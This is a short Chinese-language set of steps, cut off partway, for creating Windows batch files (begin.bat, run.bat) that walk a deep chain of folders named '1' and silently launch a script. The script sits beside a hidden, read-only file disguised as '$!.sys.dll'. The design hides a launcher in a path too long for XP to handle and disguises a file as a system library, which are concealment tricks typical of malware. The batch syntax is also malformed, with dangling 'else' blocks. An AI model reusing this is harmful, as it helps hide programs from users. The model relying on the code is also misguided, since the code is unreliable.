1.在C:\begin生成文件begin.bat,内容为:
rem don't amaize why i am calling a !.bat file... or you look the rem code of the !.bat yourself... actually it's a too long path and rem xp doesn't support........
echo off
:br
cd 1
if exist run.bat goto bgn
) else (
goto :br
:bgn
start /low run.bat
goto end
:end
exit
2.在C:\begin的某个子文件夹中生成文件run.bat和只读、隐藏文件$!.sys.dll,run.bat文件内容为:
echo off
:br
cd 1
if exist $!.sys.dll goto bgn
) else (
goto :br